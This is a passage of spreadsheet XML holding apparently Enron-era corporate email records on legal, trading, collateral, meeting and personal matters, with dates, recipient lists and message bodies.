	c.  Dutton will be sending over a draft proposed waiver letter for our consideration.   We told Dutton that we anticipated getting back to him on this matter early next week.  Although Dutton will be out of the office next week, he will be reachable by cell phone._x000D_
_x000D_
	Proposed going forward strategy:_x000D_
_x000D_
	Chuck and I suggest that if an acceptable waiver letter can be fashioned, that we proceed with proposal offered by F&amp;J.  We invite comments._x000D_
_x000D_
	Britt_x000D_
_x000D_
	  </t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 11:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>trip</t>
  </si>
  <si>
    <t>Ina,_x000D_
_x000D_
You can book my flight from Houston with everyone else. Sorry for the pain of having to wait on me._x000D_
_x000D_
Dutch</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 08:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bwallace@zahrsecurities.com', 'kristi.giron@cfisd.net', 'phillip.love@enron.com', 'dgiron1@pdq.net'})</t>
  </si>
  <si>
    <t>Fw: What all us Motorcross racers could use</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 12/04/2000 _x000D_
04:13 PM ---------------------------_x000D_
_x000D_
_x000D_
"hollyw" &lt;hollyw@email.msn.com&gt; on 12/04/2000 02:41:24 PM_x000D_
To: "Sheri Thomas" &lt;Sheri.Thomas@enron.com&gt;, "Shane Herzog" _x000D_
&lt;SHERZOG@ridgways.com&gt;, "Rick Couvillon" &lt;julierickcouv@hotmail.com&gt;, _x000D_
"Raymond Paterson" &lt;ray_paterson@hotmail.com&gt;, "Nicol, Gary" &lt;nicolg@bp.com&gt;, _x000D_
"Matt Frazier" &lt;fraz2girls@ev1.net&gt;, "Len" &lt;bigusdickus70@hotmail.com&gt;, _x000D_
&lt;KSowada@aol.com&gt;, "KRISTI GIRON" &lt;KRISTI.GIRON@cfisd.net&gt;, "JoJo" _x000D_
&lt;jhenness@webtv.net&gt;, "John Schmitz" &lt;jschm@telxon.com&gt;, "Jim Miller" _x000D_
&lt;jraggie1@pdq.net&gt;, "Janine Gregor" &lt;janine.gregor@talk21.com&gt;, "Diego _x000D_
Gotthelf" &lt;dygotthelf@hotmail.com&gt;, "Debbie Hall" &lt;gmind@icsi.net&gt;, "Darron C _x000D_
Giron" &lt;Darron.C.Giron@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: What all us Motorcross racers could use_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: "Ronald Jones" &lt;rjones562@earthlink.net&gt;_x000D_
To: "Scott" &lt;ssmith@mariner-energy.com&gt;; "Rochelle"_x000D_
&lt;rochelle@waterengineers.com&gt;; "Robbins, Skip" &lt;skip.robbins@eds.com&gt;;_x000D_
"James" &lt;jhennes@c2i2.com&gt;; "Holly" &lt;hollyw@email.msn.com&gt;; "Don and Rella"_x000D_
&lt;rella13@zebra.net&gt;; "Carey" &lt;cstanly@cstanly.com&gt;_x000D_
Sent: Monday, December 04, 2000 12:50 PM_x000D_
Subject: Fw: What all us Motorcross racers could use_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: "gudeaw" &lt;gudeaw@email.msn.com&gt;_x000D_
&gt; To: "Mario Smith" &lt;mariofsmith@msn.com&gt;; "Mario Augusto Silva"_x000D_
&gt; &lt;malsilva@uol.com.br&gt;; "Mike Ohannesian" &lt;mohannes@worldnet.att.net&gt;; "Don_x000D_
&gt; Atkinson" &lt;dsarva@prodigy.net&gt;; "Danilo Garcia" &lt;dang115@aol.com&gt;; "Dari_x000D_
&gt; Garcia" &lt;dario.garcia-1@kmail.ksc.nasa.gov&gt;; "Dario Garcia"_x000D_
&gt; &lt;dgarcia@darden.com&gt;; "Gladys Bunch" &lt;gbunch6772@cs.com&gt;; "Tod Lindholm"_x000D_
&gt; &lt;Tod_Lindholm@enron.net&gt;; "Carlos Antonetti" &lt;canton2330@aol.com&gt;;_x000D_
"Alfredo_x000D_
&gt; Gude" &lt;al_gude@msn.com&gt;; &lt;Andrew.Parsons@enron.com&gt;; "James Barnhart"_x000D_
&gt; &lt;jamesgbarnhart@netscape.net&gt;; "Janice Dupuy" &lt;everclear1212@msn.com&gt;;_x000D_
"Mary_x000D_
&gt; Wyatt" &lt;mswyatt@worldnet.att.net&gt;; "MaryAnn Long" &lt;malong0509@aol.com&gt;;_x000D_
&gt; &lt;DickTeel@aol.com&gt;; "Skip Robbins" &lt;skip.robbins@eds.com&gt;; "Ronald Jones"_x000D_
&gt; &lt;rjones562@earthlink.net&gt;; "Lisa Black" &lt;esblack@home.com&gt;; "Frank_x000D_
&gt; Sarmiento" &lt;trout@mpinet.net&gt;; "Gene Diers" &lt;eddd1955@earthlink.net&gt;;_x000D_
&gt; "George Fastuca" &lt;gfastuca@aol.com&gt;; "Howard Sarmiento"_x000D_
&lt;snook@mpinet.net&gt;;_x000D_
&gt; "Jerry Setlle" &lt;jlsettle@aol.com&gt;; "Jon Trevelise" &lt;jtrevelise@aol.com&gt;;_x000D_
&gt; "Rogelio Ortiz" &lt;rrortiz@interpoint.net&gt;_x000D_
&gt; Sent: Sunday, December 03, 2000 8:14 PM_x000D_
&gt; Subject: Fw: What all us Motorcross racers could use_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; ----- Original Message -----_x000D_
&gt; &gt; From: "Garcia, Dario M." &lt;DMGarcia@xch-bsco-06.ksc.nasa.gov&gt;_x000D_
&gt; &gt; To: &lt;DanG115@aol.com&gt;; &lt;gudeaw@email.msn.com&gt;; "Leonard, Wil E."_x000D_
&gt; &gt; &lt;WELeonar@kscbna.ksc.nasa.gov&gt;; "Masse, Jason D"_x000D_
&gt; &gt; &lt;jason.d.masse@usago.ksc.nasa.gov&gt;; "May, Henry R"_x000D_
&gt; &gt; &lt;henry.r.may@usago.ksc.nasa.gov&gt;; "Munroe, Alex"_x000D_
&gt; &gt; &lt;alex.munroe@usago.ksc.nasa.gov&gt;_x000D_
&gt; &gt; Sent: Monday, December 04, 2000 7:59 AM_x000D_
&gt; &gt; Subject: FW: What all us Motorcross racers could use_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; -----Original Message-----_x000D_
&gt; &gt; From: EXT-Dean, Bill T [SMTP:Bill.Dean@West.Boeing.com]_x000D_
&gt; &gt; &lt;mailto:[SMTP:Bill.Dean@West.Boeing.com]&gt;_x000D_
&gt; &gt; Sent: Monday, December 04, 2000 8:50 AM_x000D_
&gt; &gt; To: 'Bernie Drake'_x000D_
&gt; &gt; Subject: FW: What all us Motorcross racers could use_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt; -----Original Message-----_x000D_
&gt; &gt; &gt; From: Liam Wong [SMTP:liamwong@mindspring.com]_x000D_
&gt; &gt; &lt;mailto:[SMTP:liamwong@mindspring.com]&gt;_x000D_
&gt; &gt; &gt; Sent: 03 December, 2000 6:41 PM_x000D_
&gt; &gt; &gt; To: liamwong@mindspring.com &lt;mailto:liamwong@mindspring.com&gt;_x000D_
&gt; &gt; &gt; Subject: What all us Motorcross racers could use_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &lt;&lt;inspir.jpg&gt;&gt;_x000D_
&gt; &gt;  &lt;&lt;inspir.jpg&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
_x000D_
 - inspir.jpg_x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 04:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg.johnston@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, I wanted to get back to you on your questions and also give a little _x000D_
more detail of the analysis.  As you know, we have issues in Canada about _x000D_
taking cash collateral, which issues have been clearly identified and _x000D_
communicated by Peter previously (see his e-mails of March 20, 2001).  _x000D_
However, as opposed to cash, it appears clear under our personal property _x000D_
registration legislation that a certified cheque and a bank draft would fall _x000D_
under the definition of "instruments".  Under such legislation, as Peter has _x000D_
indicated below, a security interest in "instruments" can be perfected by _x000D_
possession, thus eliminating the need to register the security interest at _x000D_
the personal property registry, which requirement to register creates the _x000D_
perfection and priority concerns we have with holding cash collateral.  _x000D_
Therefore, at first blush, it seems that a counterparty providing a certified _x000D_
cheque or bank draft to us (in lieu of cash collateral or a letter of _x000D_
credit), which certified cheque or bank draft would be held by us in the same _x000D_
manner as we hold L/Cs, might solve our cash collateral concerns and make _x000D_
another credit instrument available to us for use in Canada._x000D_
_x000D_
There are a few concerns, which I think are raised by your questions.  The _x000D_
first is that, if we take the instrument and immediately convert it to cash _x000D_
and place the cash in an account, we run into the exact same issues as we _x000D_
have with taking cash collateral in the first place.  The personal property _x000D_
security legislation specifically indicates that proceeds realized from _x000D_
dealing with the original collateral need to be perfected in the same manner _x000D_
as original collateral of the same kind (ie. where the proceeds from the bank _x000D_
draft are cash, we need to then perfect our security interest in the cash as _x000D_
if the original collateral was cash, meaning we have the exact same issues as _x000D_
we currently have with perfecting a security interest in cash collateral).  _x000D_
Therefore, we would need to deal with the instrument (bank draft or certified _x000D_
cheque) in the same manner as we deal with L/Cs.  That is, we would cash the _x000D_
instrument in payment of outstanding accounts at the time that we become _x000D_
entitled under the contract to apply our collateral against amounts owing to _x000D_
us from the counterparty.  We would have to actually hold the certified _x000D_
cheque or bank draft until such entitlement arose._x000D_
_x000D_
The requirement to hold the bank draft or certified cheque for a potentially _x000D_
extended period of time raises another concern about how long such an _x000D_
instrument can remain outstanding before it becomes "stale dated" and thus _x000D_
undrawable.  In other words, it may well be that a bank will only allow such _x000D_
instruments to be drawable if they are presented for payment within a _x000D_
reasonable time of their issuance.  This is one point that would require _x000D_
further research if we are going to consider utlizing such instruments as _x000D_
collateral, since the answer could obviously make the use of such instruments _x000D_
a solution for only very short term transactions, if at all._x000D_
_x000D_
The final point I would make is also raised by your second question below.  _x000D_
My understanding is that the law in Canada has been somewhat grey in the past _x000D_
with respect to whether a person who issues a certified cheque (or the bank _x000D_
on which the certified cheque is drawn) can stop payment on such a cheque _x000D_
after it has been issued.  I believe that there may have been some recent _x000D_
Ontario decisions indicating that a cheque, once certified, must be honoured _x000D_
upon presentment and if the bank upon which the certified cheque is drawn _x000D_
refuses to pay, it will be liable for the amount.  However, we would need to _x000D_
look into this point further, as any risk that a certified cheque can be _x000D_
withdrawn by the payor at any time after it has been issued obviously _x000D_
eliminates the benefit of the collateral.  I do not believe that the same _x000D_
concern exists for a bank draft, as I believe it represents a fully funded _x000D_
obligation of the bank to pay, which is irrevocable._x000D_
_x000D_
If we wish to consider using such instruments as an alternate form of _x000D_
collateral, I would suggest that we have such use vetted by outside counsel _x000D_
and obtain an opinion as to the viability and risks associated with such _x000D_
use.  Since Stikeman Elliott provided our opinion with respect to cash _x000D_
collateral, I would suggest that we use them to provide the advice on these _x000D_
points as well.  Please let me know if you would like me to instruct outside _x000D_
counsel to proceed._x000D_
_x000D_
Thanks_x000D_
Greg_x000D_
_x000D_
_x000D_
From: Mark Taylor on 04/03/2001 09:05 AM CDT_x000D_
To: Peter Keohane/CAL/ECT@ECT_x000D_
cc: Brent Hendry/NA/Enron@Enron, Carol St Clair/HOU/ECT@ECT, Chris _x000D_
Gaffney/TOR/ECT@ECT, Greg Johnston/CAL/ECT@ECT, Mark Powell/CAL/ECT@ECT, Mary _x000D_
Cook/HOU/ECT@ECT, Russell Diamond/Enron@EnronXGate, Sara _x000D_
Shackleton/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Tanya _x000D_
Rohauer/Enron@EnronXGate, William  S Bradford/Enron@EnronXGate _x000D_
Subject: Re: Cash Collateral  _x000D_
_x000D_
Sounds like a great idea.  a couple of questions:_x000D_
Can we convert the draft into cash and still maintain our security interest?  _x000D_
If not, can we get the bank to somehow guarantee that the funds will be there _x000D_
- in the US that would require either certification by the bank of the _x000D_
customer's draft or the issuance of an actual bank or cashier's check._x000D_
_x000D_
_x000D_
_x000D_
	Peter Keohane_x000D_
	04/02/2001 07:02 PM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Brent _x000D_
Hendry/NA/Enron@Enron, Mary Cook/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, _x000D_
Tana Jones/HOU/ECT@ECT, William S Bradford/HOU/ECT, Russell Diamond/HOU/ECT, _x000D_
Tanya Rohauer/HOU/ECT_x000D_
		 cc: Greg Johnston/CAL/ECT@ECT, Mark Powell/CAL/ECT@ECT, Chris _x000D_
Gaffney/TOR/ECT@ECT_x000D_
		 Subject: Cash Collateral_x000D_
_x000D_
Greg Johnston may have a solution to the limitation on Canadian cash _x000D_
collateral.  Without getting into detail, a security interest in an _x000D_
"instrument" can be perfected by possession under the Personal Property _x000D_
Security Act, and an "instrument" includes a bank draft.  If counterparties _x000D_
were to provide bank drafts on the same terms as they provide LCs we could _x000D_
rely on perfection by possession.  Is this something we should investigate _x000D_
further?  Peter._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Another Step in the Process</t>
  </si>
  <si>
    <t>G$_x000D_
_x000D_
Can you please prepare a confidentiality agreement for these folks - I _x000D_
thought we would want to send our._x000D_
_x000D_
Call if you have questions._x000D_
_x000D_
Thanks_x000D_
_x000D_
Stephanie_x000D_
 -----Original Message-----_x000D_
From:  Ward, Kim S.  _x000D_
Sent: Tuesday, May 15, 2001 3:24 PM_x000D_
To: Miller, Stephanie_x000D_
Subject: FW: Another Step in the Process_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  "Greg Lander" &lt;glander@skippingstone.com&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22Greg+20Lander+22+20+3Cglander+40skippingstone+2Ecom+3E+4_x000D_
0ENRON@ENRON.com] _x000D_
Sent: Tuesday, May 15, 2001 3:10 PM_x000D_
To: Ward, Kim S._x000D_
Subject: Another Step in the Process_x000D_
_x000D_
Ms. Ward,_x000D_
_x000D_
With respect to our potential transaction,  we are anticipating sending your_x000D_
company financials and would typically have a confidentiality agreement with_x000D_
respect to that disclosure.  I am attaching the Client's standard_x000D_
Confidentiality Agreement.  It is my experience that suppliers typicall have_x000D_
ones that they are comfortable with and prefer to sign their own.  If that_x000D_
is the case, please ignore ours and send us yours.  If that is not the case,_x000D_
please have ours reviewed and changes suggested so that we may forward to_x000D_
you the information you will eventually need for credit purposes.  In_x000D_
addition, if you have standard credit provisions or terms, please forward_x000D_
those today or tommorrow so that we may prepare what we need to for your_x000D_
review._x000D_
_x000D_
Greg Lander_x000D_
Skipping Stone_x000D_
_x000D_
_x000D_
_x000D_
 - Confidentiality Agreement1.doc</t>
  </si>
  <si>
    <t>Sun, 26 Nov 2000 09:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>adams 30  631</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 05:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Houston 1996 - 2001</t>
  </si>
  <si>
    <t xml:space="preserve">I am so sorry.  You guys gave him a really good life._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Robert Kean" &lt;rkean@starband.net&gt; on 07/07/2001 01:48:08 PM_x000D_
Please respond to &lt;rkean@starband.net&gt;_x000D_
To: "Pat Hilleman \(E-mail\)" &lt;pat.hilleman@rsparch.com&gt;, "Greg Smith _x000D_
\(E-mail\)" &lt;grsmith@qwest.net&gt;, "Greg Smith \(E-mail 2\)" _x000D_
&lt;gregory_r_smith@uhc.com&gt;, "Colin Lamb \(E-mail\)" &lt;dsmcolin@home.com&gt;, _x000D_
"Maggie Kean \(E-mail\)" &lt;Ginny85956@aol.com&gt;, "Nora Kean \(E-mail\)" _x000D_
&lt;Beetle81088@aol.com&gt;, "Nora Kean \(E-mail 2\)" &lt;nora_kean@duchesne.org&gt;, _x000D_
"Sann &amp; Evelyn Gossum \(E-mail\)" &lt;gossumr@worldnet.att.net&gt;, "Doug &amp; Karen _x000D_
Reiman \(E-mail\)" &lt;dkreiman@mcleodusa.net&gt;, "Jean Kean \(E-mail\)" _x000D_
&lt;rex04@msn.com&gt;, "Kathy Wedig \(E-mail\)" &lt;kat.wedig@netzero.net&gt;, "Melissa _x000D_
Kean \(E-mail\)" &lt;kean@rice.edu&gt;, "Phil Kean \(E-mail\)" _x000D_
&lt;kean.philip@mcleodusa.net&gt;, "Steve &amp; Melissa Kean \(E-mail\)" _x000D_
&lt;skean@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Houston 1996 - 2001_x000D_
_x000D_
Houston died today after a long battle with Auto Immune Hemolytic Anemia._x000D_
Rest in peace._x000D_
_x000D_
Rob Kean_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 21:38:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>Options</t>
  </si>
  <si>
    <t>Need to go over reports and set up some sort of control process_x000D_
Assigned to: CN=Jonathan McKay/OU=CAL/O=ECT_x000D_
Updated by: CN=Jonathan McKay/OU=CAL/O=ECT</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 05:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'linda.robertson@enron.com', 'shelley.corman@enron.com'})</t>
  </si>
  <si>
    <t>DOE Meetings</t>
  </si>
  <si>
    <t xml:space="preserve">Shelley and Jim, who should follow up?_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 02/20/2001 01:07 PM -----_x000D_
_x000D_
	Michael L Miller_x000D_
	02/20/2001 11:41 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: DOE Meetings_x000D_
_x000D_
Steve,_x000D_
_x000D_
This meeting was initiated by one of our contacts at the DOE (with whom we _x000D_
have a dialogue relating to energy technology).  Some of Dr. Boyce's (do you _x000D_
know this guy) topics we can clearly cover, others are a little bit outside _x000D_
what Principal Investments does on a day to day basis.  _x000D_
_x000D_
Could you give me some guidance about who should attend this meeting?  Should _x000D_
you be there?  Where I really  need help is on the topic of Natural Gas _x000D_
Infrastructure Reliability._x000D_
_x000D_
Please call if you have any questions._x000D_
_x000D_
Michael Miller_x000D_
---------------------- Forwarded by Michael L Miller/NA/Enron on 02/20/2001 _x000D_
11:19 AM ---------------------------_x000D_
_x000D_
_x000D_
Boyce Consultancy &lt;boyceturbopower@attglobal.net&gt; on 02/20/2001 12:55:12 PM_x000D_
To: Michael L Miller &lt;Michael.L.Miller@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: DOE Meetings_x000D_
_x000D_
_x000D_
Dear Mr. Miller:_x000D_
_x000D_
It was a pleasure speaking to you and discussing the upcoming meetings with_x000D_
DOE._x000D_
_x000D_
The US Department of Energy, want to meet with ENRON Executives  to discuss_x000D_
some of the potential of various Energy Programs that are being considered_x000D_
by  the Office of Strategic Center for Natural Gas, and with Abbie Layne_x000D_
Product Manager-Advanced Heat Engines._x000D_
_x000D_
Mr. Anderson_x000D_
Product Manager_x000D_
Natural Gas Infrastructure Reliability_x000D_
Would like to discus some of the following topics:_x000D_
_x000D_
 Expected increases in the use of natural gas and projected availability of_x000D_
this fuel._x000D_
_x000D_
? Any special issues associated with distributed generation that could be_x000D_
addressed with new technologies;_x000D_
_x000D_
? Concerns about the current price and availability of natural gas causing_x000D_
on new gas-fired power initiatives;_x000D_
_x000D_
? Interdependence issues between gas and electric power;_x000D_
_x000D_
? Any specific natural gas infrastructure issues facing these companies;_x000D_
_x000D_
? The most important issue concerning natural gas reliability;_x000D_
_x000D_
? Leadership in R&amp;D;_x000D_
_x000D_
? Future technology needs; and_x000D_
_x000D_
? The NETL role in technology development to meet future industry needs._x000D_
_x000D_
Mark Williams_x000D_
Product Manager_x000D_
Fuel Cells_x000D_
Would like to discus some of the following topics:_x000D_
_x000D_
  Fuel Cell Distributed Generation (DG) benefits._x000D_
_x000D_
? DG deployment allows critical industry to stay at current location even if_x000D_
local grid is unstable and unreliable;_x000D_
_x000D_
? DG deployment obviates need for R&amp;D investment;_x000D_
_x000D_
? Fuel cell DG deployment means being able to site power with no air_x000D_
permitting required;_x000D_
_x000D_
? High fuel cell efficiency reduces operating costs for fuel, which is_x000D_
important where gas is expensive.  Additionally,  high efficiency_x000D_
utilization frees up natural gas for use at other critical locations;_x000D_
_x000D_
? Use of zero or low emission fuel cell technology in environmentally_x000D_
constrained areas permits continued use of other  high emitting generating_x000D_
plants, thus increasing the overall power available;_x000D_
?_x000D_
 Fuel cell DG deployment puts the highest quality power in the system_x000D_
increasing grid reliability and stability; and_x000D_
_x000D_
? Fuel cell attributes also enhance grid reliability through lower_x000D_
harmonics, variability control, and voltage control._x000D_
_x000D_
Abbie Layne Product Manager-_x000D_
Advanced Heat Engines._x000D_
Would like to discus some of the following topics:_x000D_
_x000D_
 New developments in Gas Turbines_x000D_
_x000D_
 Increasing Reliability and Maintainability of Gas Turbines_x000D_
_x000D_
 Combined Cycle Power Plants Increasing Efficiency_x000D_
_x000D_
 Hybrid Power Systems_x000D_
_x000D_
 Condition Monitoring Systems._x000D_
_x000D_
_x000D_
This meeting would be for about 3-4 hours at ENRON's  facilities. The_x000D_
meetings  arranged for March 6 morning.._x000D_
_x000D_
A dinner for the DOE is planned at our home at the Huntingdon 2121 Kirby_x000D_
Drive, for March 7, 2001 at 7:00 pm, and you and your spouse, and other_x000D_
executives from ENRON are invited._x000D_
_x000D_
I am looking forward to meeting with you._x000D_
_x000D_
With best regards,_x000D_
_x000D_
_x000D_
Dr. Meherwan P. Boyce, P.E._x000D_
THE BOYCE CONSULTANCY_x000D_
2121 KIRBY DRIVE, 28N_x000D_
HOUSTON, TX. 77019_x000D_
USA_x000D_
PHONE: 713-807-0888_x000D_
FAX: 713-807-0088_x000D_
MOBILE-USA: 713-306-9776_x000D_
MOBILE-EUROPE &amp; ASIA: 44-467-207-600_x000D_
E-mail: boyceturbopower@attglobal.net_x000D_
Web Site: www.boyceconsultancy.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Oct 1999 07:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'g.aarti@enron.com'})</t>
  </si>
  <si>
    <t>Potential market maker</t>
  </si>
  <si>
    <t xml:space="preserve">Rebecca:_x000D_
_x000D_
This is the response I got back from my contact at IBJ.  Let me know if you _x000D_
would like to meet Terry.  Mark_x000D_
---------------------- Forwarded by Mark E Haedicke/HOU/ECT on 10/19/99 02:29 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
teruo.tanaka@ibjbank.co.jp on 10/14/99 10:56:06 PM_x000D_
To: Mark E Haedicke/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Potential market maker_x000D_
_x000D_
_x000D_
_x000D_
Dear Mark,_x000D_
_x000D_
Thank you for your e-mail. I have asked around our business people about_x000D_
your inquiry._x000D_
_x000D_
At the moment, there are no institution that stands out in that field in_x000D_
the Tokyo market. However, we, IBJ, are probably the most enthusiastic_x000D_
about it. Historically, we have kept the strongest relationship with the_x000D_
electricity companies and oil refineries. Their bond issues keep our_x000D_
securities subsidiary on the top book runners list. Therefore, we are_x000D_
researching on the product. Other Japanese firms seem to be less_x000D_
interested._x000D_
_x000D_
Although I would think it should take a while to persuade those most_x000D_
conservative companies like Tokyo Electricity et al., the product does_x000D_
have a potential here._x000D_
_x000D_
In fact our derivatives and math men were really keen to talk to you and_x000D_
learn more about the product._x000D_
_x000D_
Please let me know if I can be of any further help._x000D_
_x000D_
Terry_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 10:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carolyn.george@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'jessica.anaya@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'donna.lowry@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'james.grace@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'mary.cook@enron.com', 'lance.schuler-legal@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'chaundra.woods@enron.com', 'erica.braden@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'chris.gaffney@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'wayne.gresham@enron.com', 'monica.richards@enron.com', 'merrill.haas@enron.com', 'paula.craft@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'richard.jeffrey@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'gloria.cruz@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'susan.flynn@enron.com', 'debra.perlingiere@enron.com', 'reginald.shanks@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'joya.davis@enron.com', 'travis.mccullough@enron.com', 'claudia.meraz@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'marie.heard@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>Visitor:  Fritz vonBrunneck</t>
  </si>
  <si>
    <t>Fritz vonBrunneck, a second year law student in Germany is visiting ENA - _x000D_
Legal for several weeks.  His location is EB3876C.  Please stop by and _x000D_
introduce yourself to Fritz._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Julia Heintz Murray_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB3835_x000D_
Houston, TX  77002_x000D_
(713) 853-4794_x000D_
Fax:  (713) 646-3393_x000D_
julia.murray@enron.com</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 04:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'enron-owner@lists.qgadc.com'})</t>
  </si>
  <si>
    <t>frozenset({'susan.m.landwehr@enron.com', 'linda.robertson@enron.com', 'lora.sullivan@enron.com', 'paul.kaufman@enron.com', 'enron@lists.qgadc.com'})</t>
  </si>
  <si>
    <t>AGENDA for 4:00 p.m. Meeting</t>
  </si>
  <si>
    <t>(See attached file: Agenda.doc)_x000D_
_x000D_
                                 REMINDER:_x000D_
                    Meeting of CA Energy Working Group_x000D_
                   Monday, May 14, 2001 at 4:00 PM (EST)_x000D_
                  Location:  Enron, Large Conference Room_x000D_
                            1775 Eye Street, NW_x000D_
                                 Suite 800_x000D_
                           Washington, DC  20006_x000D_
_x000D_
             PLEASE PLAN ON ATTENDING THIS IMPORTANT MEETING._x000D_
_x000D_
                  For those of you not in Washington, DC_x000D_
                               please call:_x000D_
                          800-713-8600; Code 6261_x000D_
 - Agenda.doc</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 02:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cathy.sprowls@enron.com'})</t>
  </si>
  <si>
    <t>Re: Preliminary Central Summary 03/01 GL</t>
  </si>
  <si>
    <t>the variances you have listed in january for lone liquidations for NNG - _x000D_
QN8046 - this is a storage deal and should go with sitara #588958 and QO0171 _x000D_
should go with 590922.  We will have the same thing in February going the _x000D_
other way with these deals the sitara numbers there are 588959 &amp; 591053 _x000D_
respectively.  Shout with any questions.  This should explain about 900,000 _x000D_
of the lone liquidation problem from January._x000D_
PL</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 01:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ellen_r_dailey@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Re: Document Routing</t>
  </si>
  <si>
    <t xml:space="preserve">Ellen,_x000D_
 You may send me the documents at 1400 Smith Street, Suite 3878, Houston, TX _x000D_
77002._x000D_
_x000D_
_x000D_
_x000D_
	Ellen_R_Dailey@reliantenergy.com_x000D_
	12/11/2000 11:38 AM_x000D_
		 _x000D_
		 To: dan.j.hyvl@enron.com_x000D_
		 cc: _x000D_
		 Subject: Document Routing_x000D_
_x000D_
_x000D_
Hi Dan:_x000D_
_x000D_
Just an update to let you know the status of the agreements between Reliant_x000D_
